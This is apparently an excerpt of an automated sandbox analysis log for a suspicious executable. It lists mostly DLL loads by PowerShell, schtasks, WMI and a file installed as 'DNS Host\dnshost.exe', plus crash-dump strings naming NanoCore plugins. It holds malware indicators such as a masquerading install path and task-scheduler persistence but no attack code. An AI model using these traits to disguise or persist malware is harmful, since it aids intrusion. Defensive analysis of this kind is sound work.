Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: dwrite.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: textshaping.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: iconcodecservice.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: dwrite.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: textshaping.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: iconcodecservice.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: nD2ozRD7MN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: nD2ozRD7MN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Xml.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: MyClientPlugin.pdblt source: WER3715.tmp.dmp.25.dr
Source:	Binary string: NanoCoreStressTester.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: Accessibility.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: FileBrowserClient.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.pdbu source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.pdb source: WER3715.tmp.dmp.25.dr
